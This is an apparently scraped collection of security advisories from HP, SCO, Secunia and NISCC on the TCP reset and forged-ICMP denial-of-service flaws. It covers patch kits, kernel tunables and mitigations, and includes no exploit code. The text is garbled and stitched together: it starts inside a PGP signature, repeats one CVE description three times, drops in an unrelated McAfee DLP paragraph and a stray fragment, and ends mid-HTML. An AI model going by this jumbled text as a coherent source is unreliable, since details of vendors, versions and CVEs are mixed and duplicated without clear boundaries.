fjKXZ3hbnTeQeIn9Kk9ePC1d =cFE+ -----END PGP SIGNATURE----- . HP Tru64 UNIX 5.1B-3 HP Tru64 UNIX 5.1B-2/PK4 HP Tru64 UNIX 5.1A PK HP Tru64 UNIX 4.0G PK4 HP Tru64 UNIX 4.0F PK8 BACKGROUND: Special Instructions for the Customer The Internet Control Message Protocol (ICMP) (RFC 792) is used in the Internet Architecture to perform fault-isolation and recovery (RFC816), which is the group of actions that hosts and routers take to determine if a network failure has occurred. The industry standard TCP specification (RFC 793) has a vulnerability whereby ICMP packets can be used to perform a variety of attacks such as blind connection reset attacks and blind throughput-reduction attacks. Path MTU Discovery (RFC 1191) describes a technique for dynamically discovering the MTU (maximum transmission unit) of an arbitrary internet path. This protocol uses ICMP packets from the router to discover the MTU for a TCP connection path. HP has addressed these potential vulnerabilities by providing a new kernel tunable in Tru64 UNIX V5.1B and 5.1A, icmp_tcpseqcheck. In Tru64 4.0F and 4.0G, HP has introduced two new kernel tunables, icmp_tcpseqcheck and icmp_rejectcodemask. This behavior protects TCP against spoofed ICMP packets. Set the tunable as follows: icmp_tcpseqcheck=1 (default) Provides a level of protection that reduces the possibility of considering a spoofed ICMP packet as valid to one in two raised to the thirty-second power. icmp_tcpseqcheck=0 Retains existing behavior, i.e., accepts all ICMP packets icmp_rejectcodemask In the Requirements for IP Version 4 Routers (RFC 1812), research suggests that the use of ICMP Source Quench packets is an ineffective (and unfair) antidote for congestion. Thus, HP recommends completely ignoring ICMP Source Quench packets using the icmp_rejectcodemask tunable. The icmp_rejectcodemask is a bitmask that designates the ICMP codes that the system should reject. For example, to reject ICMP Source Quench packets, set the mask bit position for the ICMP_SOURCEQUENCH code 4, which is two to the 4th power = 16 (0x10 hex). The icmp_rejectcodemask tunable can be used to reject any ICMP packet type, or multiple masks can be combined to reject more than one type. Note: the ICMP type codes are defined in "/usr/include/netinet/ip_icmp.h". Set the tunable as follows: icmp_rejectcodemask = 0x10 Rejects ICMP Source Quench packets icmp_rejectcodemask = 0 (default) Retains existing behavior, i.e., accepts all ICMP packets Adjusting the variables The ICMP sequence check variable (icmp_tcpseqcheck) can be adjusted using the sysconfig and sysconfigdb commands: # sysconfig -q inet icmp_tcpseqcheck inet: icmp_tcpseqcheck = 1 # sysconfig -r inet icmp_tcpseqcheck=0 icmp_tcpseqcheck: reconfigured # sysconfig -q inet icmp_tcpseqcheck inet: icmp_tcpseqcheck = 0 # sysconfig -q inet icmp_tcpseqcheck > /tmp/icmp_tcpseqcheck_merge # sysconfigdb -m -f /tmp/icmp_tcpseqcheck_merge inet # sysconfigdb -l inet inet: icmp_tcpseqcheck = 1 Similarly, the icmp_rejectcodemask variable can be adjusted using the sysconfig and sysconfigdb commands: # sysconfig -q inet icmp_rejectcodemask inet: icmp_rejectcodemask = 0 # sysconfig -r inet icmp_rejectcodemask=0x10 icmp_rejectcodemask: reconfigured # sysconfig -q inet icmp_rejectcodemask inet: icmp_rejectcodemask = 16 # sysconfig -q inet icmp_rejectcodemask > /tmp/icmp_rejectcodemask_merge # sysconfigdb -m -f /tmp/icmp_rejectcodemask_merge inet # sysconfigdb -l inet inet: icmp_rejectcodemask = 16 RESOLUTION: Until the corrections are available in a mainstream release patch kit, HP is releasing the following Early Release Patch (ERP) kits publicly for use by any customer. The ERP kits use dupatch to install and will not install over any installed Customer Specific Patches (CSPs) that have file intersections with the ERPs. Contact your service provider for assistance if the ERP installation is blocked by any of your installed CSPs. The fixes contained in the ERP kits are scheduled to be available in the following mainstream patch kits: HP Tru64 Unix 5.1B-4 Early Release Patches The ERPs deliver the following file: /sys/BINARY/inet.mod HP Tru64 UNIX 5.1B-3 ERP Kit Name: T64KIT0025925-V51BB26-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025925-V51BB26-ES-20050628 MD5 checksum: 129251787a426320af16cd584b982027 HP Tru64 UNIX 5.1B-2/PK4 ERP Kit Name: T64KIT0025924-V51BB25-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025924-V51BB25-ES-20050628 MD5 checksum: 5fcc77a6876db6d10ef07ac96e11b3af HP Tru64 UNIX 5.1A PK6 ERP Kit Name: T64KIT0025922-V51AB24-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025922-V51AB24-ES-20050628 MD5 checksum: 7c373b35c95945651a1cfda96bf71421 HP Tru64 UNIX 4.0G PK4 ERP Kit Name: T64KIT0025920-V40GB22-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025920-V40GB22-ES-20050628 MD5 checksum: 13849fd555239d75d300d1cb46dc995f HP Tru64 UNIX 4.0F PK8 ERP Kit Name: DUXKIT0025921-V40FB22-ES-20050628 Kit Location: http://www.itrc.hp.com/service/patch/patchDetail.do? patchid=T64KIT0025920-V40GB22-ES-20050628 MD5 checksum: 743b614d39f185802701b7f2dd14ffa5 MD5 checksums are available from the ITRC patch database main page: http://www.itrc.hp.com/service/patch/mainPage.do - From the patch database main page, click Tru64 UNIX, then click verifying MD5 checksums under useful links. The RFC recommends no security checking for in-bound ICMP messages, so long as a related connection exists, and may potentially allow several different Denials of Service. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-0790 to this issue. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-0791 to this issue. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2004-1060 to this issue. Vulnerable Supported Versions System Binaries ---------------------------------------------------------------------- OpenServer 5.0.6 ip and tcp drivers OpenServer 5.0.7 ip and tcp drivers 3. Solution The proper solution is to install the latest packages. OpenServer 5.0.6 4.1 Location of Fixed Binaries ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.4 4.2 Verification MD5 (VOL.000.000) = 03ed8e901780e1535c113efeba72d8cd md5 is available for download from ftp://ftp.sco.com/pub/security/tools 4.3 Installing Fixed Binaries The following packages should be installed on your system before you install this fix: RS506A OSS646 ERG711746: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.3/SCOSA-2005.3.txt ERG712606: ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2005.9/SCOSA-2005.9.txt Upgrade the affected binaries with the following sequence: 1) Download the VOL* files to a directory. 2) Run the custom command, specify an install from media images, and specify the directory as the location of the images. OpenServer 5.0.7 5.1 Location of Fixed Binaries ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2006.4 5.2 Verification MD5 (VOL.000.000) = 03ed8e901780e1535c113efeba72d8cd md5 is available for download from ftp://ftp.sco.com/pub/security/tools 5.3 Installing Fixed Binaries The following package should be installed on your system before you install this fix: OSR507MP4 - OpenServer 5, Release 5.0.7 Maintenance Pack 4 Upgrade the affected binaries with the following sequence: 1) Download the VOL* files to a directory. 2) Run the custom command, specify an install from media images, and specify the directory as the location of the images. References Specific references for this advisory: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0790 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0791 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1060 SCO security resources: http://www.sco.com/support/security/index.html SCO security advisories via email http://www.sco.com/support/forums/security.html This security fix closes SCO incidents sr892503 fz530662 erg712759. Disclaimer SCO is not responsible for the misuse of any of the information we provide on this website and/or through our security advisories. Our advisories are a service to our customers intended to promote secure installation and use of SCO products. Acknowledgments The SCO Group would like to thank Fernando Gont for reporting these issues. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . ---------------------------------------------------------------------- Want to work within IT-Security? Secunia is expanding its team of highly skilled security experts. We will help with relocation and obtaining a work permit. Currently the following type of positions are available: http://secunia.com/hardcore_disassembler_and_reverse_engineer/ ---------------------------------------------------------------------- TITLE: Microsoft Windows Multiple IPv6 Denial of Service Vulnerabilities SECUNIA ADVISORY ID: SA22341 VERIFY ADVISORY: http://secunia.com/advisories/22341/ CRITICAL: Less critical IMPACT: DoS WHERE: >From remote OPERATING SYSTEM: Microsoft Windows XP Professional http://secunia.com/product/22/ Microsoft Windows XP Home Edition http://secunia.com/product/16/ Microsoft Windows Server 2003 Web Edition http://secunia.com/product/1176/ Microsoft Windows Server 2003 Standard Edition http://secunia.com/product/1173/ Microsoft Windows Server 2003 Enterprise Edition http://secunia.com/product/1174/ Microsoft Windows Server 2003 Datacenter Edition http://secunia.com/product/1175/ DESCRIPTION: Three vulnerabilities have been reported in Microsoft Windows, which can be exploited by malicious people to cause a DoS (Denial of Service). 1) A vulnerability exists in the IPv6 Windows implementation of ICMP which, if successfully exploited, results in the system dropping an existing connection. 3) A vulnerability exists in the IPv6 implementation of TCP/IP which, if successfully exploited, could cause the system to stop responding. Successful exploitation of the vulnerabilities requires IPv6 to be configured (not enabled by default). Microsoft Windows XP SP1/SP2: http://www.microsoft.com/downloads/details.aspx?FamilyId=9fd73d12-ff7c-411d-944d-a6f147b20775 Microsoft Windows XP Professional x64 Edition: http://www.microsoft.com/downloads/details.aspx?FamilyId=fc98f55c-520e-4a68-a3c3-0df51c6122bb Microsoft Windows Server 2003 (with or without SP1): http://www.microsoft.com/downloads/details.aspx?FamilyId=102591a0-2b58-497b-bc20-593571b96e9c Microsoft Windows Server 2003 (Itanium, with or without SP1): http://www.microsoft.com/downloads/details.aspx?FamilyId=12515d47-134d-4d1f-9ae7-f0a7167ec424 Microsoft Windows Server 2003 x64 Edition: http://www.microsoft.com/downloads/details.aspx?FamilyId=c5faba34-48f5-4875-a0fa-6b8207f9b276 PROVIDED AND/OR DISCOVERED BY: Reported by the vendor. ORIGINAL ADVISORY: MS06-064 (KB922819): http://www.microsoft.com/technet/security/Bulletin/MS06-064.mspx ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) on an active TCP session

The original design of ICMP does not require authentication for host-generated ICMP error messages, which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged "Destination Unreachable" messages, (2) blind throughput-reduction attacks with forged "Source Quench" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks. ICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message. Reportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection. The following individual attacks are reported: - A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue. A remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users. - An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. - An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. **Update: Microsoft platforms are also reported prone to these issues

The original design of TCP does not require that port numbers be assigned randomly (aka "Port randomization"), which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged "Destination Unreachable" messages, (2) blind throughput-reduction attacks with forged "Source Quench" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks. ICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message. Reportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection. The following individual attacks are reported: - A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue. A remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users. - An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. - An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. **Update: Microsoft platforms are also reported prone to these issues

The original design of TCP does not check that the TCP Acknowledgement number in an ICMP error message generated by an intermediate router is within the range of possible values for data that has already been acknowledged (aka "TCP acknowledgement number checking"), which makes it easier for attackers to forge ICMP error messages for specific TCP connections and cause a denial of service, as demonstrated using (1) blind connection-reset attacks with forged "Destination Unreachable" messages, (2) blind throughput-reduction attacks with forged "Source Quench" messages, or (3) blind throughput-reduction attacks with forged ICMP messages that cause the Path MTU to be reduced. NOTE: CVE-2004-0790, CVE-2004-0791, and CVE-2004-1060 have been SPLIT based on different attacks; CVE-2005-0065, CVE-2005-0066, CVE-2005-0067, and CVE-2005-0068 are related identifiers that are SPLIT based on the underlying vulnerability. While CVE normally SPLITs based on vulnerability, the attack-based identifiers exist due to the variety and number of affected implementations and solutions that address the attacks instead of the underlying vulnerabilities. A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. Multiple vendor implementations of TCP/IP Internet Control Message Protocol (ICMP) are reported prone to several denial-of-service attacks. ICMP is employed by network nodes to determine certain automatic actions to take based on network failures reported by an ICMP message. Reportedly, the RFC doesn't recommend security checks for ICMP error messages. As long as an ICMP message contains a valid source and destination IP address and port pair, it will be accepted for an associated connection. The following individual attacks are reported: - A blind connection-reset attack. This attack takes advantage of the specification that describes that on receiving a 'hard' ICMP error, the corresponding connection should be aborted. The Mitre ID CAN-2004-0790 is assigned to this issue. A remote attacker may exploit this issue to terminate target TCP connections and deny service for legitimate users. - An ICMP Source Quench attack. This attack takes advantage of the specification that a host must react to receive ICMP Source Quench messages by slowing transmission on the associated connection. The Mitre ID CAN-2004-0791 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. - An attack against ICMP PMTUD is reported to affect multiple vendors when they are configured to employ PMTUD. By sending a suitable forged ICMP message to a target host, an attacker may reduce the MTU for a given connection. The Mitre ID CAN-2004-1060 is assigned to this issue. A remote attacker may exploit this issue to degrade the performance of TCP connections and partially deny service for legitimate users. **Update: Microsoft platforms are also reported prone to these issues

A vulnerability exists in the reliance of the Border Gateway Protocol (BGP) on the Transmission Control Protocol (TCP) to maintain persistent sessions. Sustained exploitation of this vulnerability could lead to a denial-of-service condition affecting a large segment of the Internet community. Normal operations would most likely resume shortly after the attack stopped. McAfee Data Loss Prevention (DLP) is a set of data loss prevention solutions from McAfee. The solution protects intellectual property and ensures compliance by protecting the environment in which sensitive data resides (on-premise, in the cloud, or on the endpoint). Cross-site scripting vulnerabilities and cross-site request forgery vulnerabilities exist in McAfee DLP. When the user browses the affected website, his browser will execute any script code provided by the attacker, which may cause the attacker to steal cookie-based authentication, perform unauthorized operations, leak or modify sensitive information, or other forms may exist. s attack. A vulnerability in TCP implementations may permit unauthorized remote users to reset TCP sessions. This issue affects products released by multiple vendors. Exploiting this issue may permit remote attackers to more easily approximate TCP sequence numbers. The problem is that affected implementations will accept TCP sequence numbers within a certain range of the expected sequence number for a packet in the session. This will permit a remote attacker to inject a SYN or RST packet into the session, causing it to be reset and effectively allowing denial-of-service attacks. An attacker would exploit this issue by sending a packet to a receiving implementation with an approximated sequence number and a forged source IP and TCP port. Few factors may present viable target implementations, such as imlementations that: - depend on long-lived TCP connections - have known or easily guessed IP address endpoints - have known or easily guessed TCP source ports. As a result, this issue is likely to affect a number of routing platforms. Note also that while a number of vendors have confirmed this issue in various products, investigations are ongoing and it is likely that many other vendors and products will turn out to be vulnerable as the issue is investigated further. Other consequences may also result from this issue, such as injecting specific data in TCP sessions, but this has not been confirmed. **Update: Microsoft platforms are also reported prone to this vulnerability. Vendor reports indicate that an attacker will require knowledge of the IP address and port numbers of the source and destination of an existent legitimate TCP connection in order to exploit this vulnerability on Microsoft platforms. Other attacks may also be possible. <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> <title>NISCC Vulnerability Advisory 236929</title> <style> <!-- body { font-family: Verdana } --> </style> </head> <body bgcolor="#FFFFCC"> <div class=Section1 style="width: 100%;"> <div align="center"><img src="http://www.niscc.gov.uk/images/newtitle.gif" width="766" height="80" alt="National Infrastructure Security Co-Ordination Centre"></div> <br> <font size="4"><b><font color="#FF0000">NISCC Vulnerability Advisory 236929</b></font><br> <br> <b>Vulnerability Issues in TCP</b></font><br> <br> <br> <b><font size="3">Version</font> Information</b> <br><br> <table border="1" width="61%"> <tr> <td width="58%">Advisory Reference</td> <td width="77%">236929</td> </tr> <tr> <td width="58%">Release Date</td> <td width="77%">20 April 2004</td> </tr> <tr> <td width="58%">Last Revision</td> <td width="77%">22 April 2004</td> </tr> <tr> <td width="58%">Version Number</td> <td width="77%">1.4</td> </tr> </table> &nbsp;<br><br> <b>What is Affected?</b><br> <br> The vulnerability described in this advisory affects implementations of the Transmission Control Protocol (TCP) that comply with the Internet Engineering Task Force\x92s (IETF\x92s) Requests For Comments (RFCs) for TCP, including <a href="http://www.ietf.org/rfc/rfc0793.txt">RFC 793</a>, the original specification, and <a href="http://www.ietf.org/rfc/rfc1323.txt">RFC 1323</a>, TCP Extensions for High Performance.<br> <br> TCP is a core network protocol used in the majority of networked computer systems today. Many vendors include support for this protocol in their products and may be impacted to varying degrees. Furthermore any network service or application that relies on a TCP connection will also be impacted, the severity depending primarily on the duration of the TCP session. <br> <br> <br> <b>Severity</b><br> <br> The impact of this vulnerability varies by vendor and application, but in some deployment scenarios it is rated critical. Please see the vendor section below for further information. Alternatively contact your vendor for product specific information.<br> <br> If exploited, the vulnerability could allow an attacker to create a Denial of Service condition against existing TCP connections, resulting in premature session termination. The resulting session termination will affect the application layer, the nature and severity of the effects being dependent on the application layer protocol. The primary dependency is on the duration of the TCP connection, with a further dependency on knowledge of the network (IP) addresses of the end points of the TCP connection.<br> <br> The Border Gateway Protocol (BGP) is judged to be potentially most affected by this vulnerability.<br> <br> BGP relies on a persistent TCP session between BGP peers. Resetting the connection can result in medium term unavailability due to the need to rebuild routing tables and route flapping.&nbsp; Route flapping may result in route dampening (suppression) if the route flaps occur frequently within a short time interval.&nbsp; The overall impact on BGP is likely to be moderate based on the likelihood of successful attack. If the TCP MD5 Signature Option and anti-spoofing measures are used then the impact will be low as these measures will successfully mitigate the vulnerability.<br> <br> There is a potential impact on other application protocols such as DNS (Domain Name System) and SSL (Secure Sockets Layer) in the case of zone transfers and ecommerce transactions respectively, but the duration of the sessions is relatively short and the sessions can be restarted without medium term unavailability problems. In the case of SSL it may be difficult to guess the source IP address.<br> <br> Data injection may be possible. However, this has not been demonstrated and appears to be problematic. <br> <br> <br> <b>Summary</b><br> <br> The issue described in this advisory is the practicability of resetting an established TCP connection by sending suitable TCP packets with the RST (Reset) or SYN (Synchronise) flags set.<br> <br> The packets need to have source and destination IP addresses that match the established connection as well as the same source and destination TCP ports.<br> <br> The fact that TCP sessions can be reset by sending suitable RST and SYN packets is a design feature of TCP according to <a href="http://www.ietf.org/rfc/rfc0793.txt">RFC 793</a>, but a reset attack is only possible at all because the source IP address and TCP port can be forged or \x93spoofed\x94.<br> <br> Although denial of service using crafted TCP packets is a well known weakness of TCP, until recently it was believed that a successful denial of service attack was not achievable in practice. The reason for this is that the receiving TCP implementation checks the sequence number of the RST or SYN packet, which is a 32 bit number, giving a probability of 1/2^{<font size="2">32</font>} of guessing the sequence number correctly (assuming a random distribution).<br> <br> The discoverer of the practicability of the RST attack was Paul A. Watson, who describes his research in his paper \x93Slipping In The Window: TCP Reset Attacks\x94, presented at the CanSecWest 2004 conference. <br> <br> <br> <b>Details</b><br> <br> TCP is the transport layer protocol designed to provide connection-oriented reliable delivery of IP packets. The acknowledgement number is not used in a RST packet because a reset does not expect a packet in return. (To be completely accurate, although the last statement is true for a RST packet without the ACK flag set, used to indicate that a TCP port is closed, a RST/ACK is used to terminate an active connection in the event of error. In a RST/ACK packet an acknowledgement number is included in the packet, although it is not checked by the receiving TCP implementation.)<br> <br> <a href="http://www.ietf.org/rfc/rfc0793.txt">RFC 793</a>, p36, states the following:<br> <br> &quot;In all states except SYN-SENT, all reset (RST) segments are validated by checking their SEQ-fields [sequence numbers]. A reset is valid if its sequence number is in the window. In the SYN-SENT state (a RST received in response to an initial SYN), the RST is acceptable if the ACK field acknowledges the SYN.&quot;<br> <br> Resets must be processed immediately. <a href="http://www.ietf.org/rfc/rfc0793.txt">RFC 793</a>, p25, says &quot;[\x85] [E]ven when the receive window is zero, a TCP must process the RST and URG fields of all incoming segments.&quot;<br> <br> It is also possible to perform the same attack with SYN (synchronise) packets. <a href="http://www.ietf.org/rfc/rfc0793.txt">RFC 793</a>, p31 states:<br> <br> \x93The principle reason for the three-way handshake is to prevent old duplicate connection initiations from causing confusion. To deal with this, a special control message, reset, has been devised. [\x85] If the TCP is in one of the synchronized states (ESTABLISHED, FIN-WAIT-1, FIN-WAIT-2, CLOSE-WAIT, CLOSING, LAST-ACK, TIME-WAIT), it aborts the connection and informs its user.\x94<br> <br> TCP window sizes are negotiated in the initial 3-way handshake used to set up a TCP connection, with higher values serving to improve throughput in some circumstances. Vendor-chosen defaults also influence the selection. This is the basis for the attack.<br> <br> A TCP connection is defined by a 4-tuple comprising source and destination IP addresses, and source and destination ports. An attacker seeking to disrupt an existing TCP connection must supply the 4-tuple correctly. As the source port varies, additional work is generally called for on the part of the attacker. However, research (referenced below) has shown that the process of source port selection on many platforms includes predictable elements, so that the attack remains practicable. By weighting 'likely' source port values carefully, an attacker can disrupt TCP implementations that employ a range of window sizes.<br> <br> Application layer protocols that are critically affected are those that:<br> <br> <table border="0" cellpadding="4" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6"> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="96%">Depend on long lived TCP connections</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="96%">Have known or easy-to-guess IP address end points</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="96%">Have easy to an easy-to-guess source TCP port</td> </tr> </table> <p>As noted above BGP does use long lived TCP connections, and the IP addresses and source port (and destination port) are sometimes available through the use of BGP looking glasses (multi-source, multi-destination trace route tools) or DNS resource records. Using \x93trace route\x94 commands can provide information on peering point IP addresses. Thus BGP is likely to be critically affected by the TCP vulnerability.<br> <br> These denial of service attacks can be carried out by single machine, or by multiple co-operating systems (to form a distributed denial of service attack).<br> <br> It is also possible to inject packets, which will be processed if they are in the window. The difficulty with data injection attacks is that the receiving TCP implementation will reassemble the packets received according to sequence number, dropping any duplicate packets.<br> <br> <br> Vendor specific information will be released as it becomes available and if vendor permission has been received. Subscribers are advised to check the following URL regularly for updates:<br> <br> <a href="http://www.uniras.gov.uk/vuls/2004/236929/index.htm">http://www.uniras.gov.uk/vuls/2004/236929/index.htm</a><br> <br> <i>[Please note that updates to this advisory will not be notified by email.]</i><br> <br> This vulnerability has been assigned the <a href="http://cve.mitre.org/cve">CVE</a> name <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0230">CAN-2004-0230</a>.<br> <br> The <a href="http://www.osvdb.org">Open Source Vulnerability Database</a> ID number for this vulnerability is <a href="http://www.osvdb.org/displayvuln.php?osvdb_id=4030">4030</a>.<br> <br> <br> <b>Mitigation</b><br> <br> The following mitigation steps are still being evaluated and may be incomplete. Customers should work with vendors for the workaround most appropriate for the product in question.<br> <br> In the absence of vendor patching of the TCP implementation, the following are general mitigating steps:<br> <br> <table border="0" cellpadding="4" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4"> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="97%">Implement IP Security (IPSEC) which will encrypt traffic at the network layer, so TCP information will not be visible</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="97%">Reduce the TCP window size (although this could increase traffic loss and subsequent retransmission)</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="97%">Do not publish TCP source port information</td> </tr> </table> <p>It should be noted that IPSEC provides confidentiality and authentication services at the network layer, and can provide a measure of trust in the authenticity of the end points as well as encryption of traffic between the end points.&nbsp; However, in the context of the current attack IPSEC will reject RST and SYN packets that are not part of a secure IP packet stream.<br> <br> To change the TCP window size, in some Unix variants you can set a value of the default TCP windows size by using the \x93sysctl\x94 program (\x93ndd -set\x94 in the case of Sun Solaris). In the case of Microsoft Windows NT/2000/XP/2003, the default window size can be changed by modifying the value of the HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters key. As noted above, great care should be exercised when altering the default TCP window size as network performance could be adversely affected.<br> <br> In the case of BGP, the following may counter the problem:<br> <br> <table border="0" cellpadding="4" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber5"> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="96%">Implement ingress and egress filtering to check that the traffic entering or leaving the network has a source IP address that is expected on the router/firewall interface that receives the traffic</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="96%">Implement the TCP MD5 Signature Option to checksum the TCP packet carrying the BGP application data (see <a href="http://www.ietf.org/rfc/rfc2385.txt">RFC 2385</a>), being careful to set and maintain strong (i.e. difficult to guess) passwords to which the MD5 checksum is applied.&nbsp; Also see <a href="http://www.ietf.org/rfc/rfc3562.txt">RFC 3562</a> which discusses the security requirements of this keying material.</td> </tr> <tr> <td width="3%" align="left" valign="top">\x95 </td> <td width="96%">Limit the amount of information available through looking glasses and DNS resource records, being careful not to expose TCP port information unnecessarily</td> </tr> </table> <p> The IETF ingress filtering standard is defined in <a href="http://www.ietf.org/rfc/rfc2827.txt">RFC 2827</a>. A discussion of egress filtering can be found at <a href="http://www.sans.org/y2k/egress.htm">http://www.sans.org/y2k/egress.htm</a>.<br> <br> The use of the TCP MD5 Signature Option will prevent the exploitation of this vulnerability. Router customers should implement this on all BGP peering points if it is supported by the router, upgrading the router firmware if necessary.<br> <br> <br> <b>Solution</b><br> <br> Please refer to the Vendor Information section of this advisory for implementation specific remediation.<br> <br> Some vendors will have reduced the likelihood of successful denial of service by amending the TCP implementation to issue a further acknowledgment packet challenge for RST and SYN packets that do not have exactly the expected sequence number.<br> <br> <a href="http://www.ietf.org">The Internet Engineering Task Force</a> (IETF) has published an Internet Draft to co-incide with the release of this advisory.&nbsp; The text of this draft is available from the IETF web site:<br> <a href="http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt">http://www.ietf.org/internet-drafts/draft-ietf-tcpm-tcpsecure-00.txt</a><br> <br> NISCC has produced best practice guidelines for BGP available at<br> <a href="http://www.niscc.gov.uk/BGP%20Filtering%20Guide.pdf">http://www.niscc.gov.uk/BGP Filtering Guide.pdf</a><br> <br> Secure configuration templates for BGP implementations on Cisco IOS and Juniper JUNOS can be found at:<br> <br> <table border="0" cellpadding="4" cellspacing="1" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber2"> <tr> <td width="3%">\x95 </td> <td width="11%">Cisco </td> <td width="99%"><a 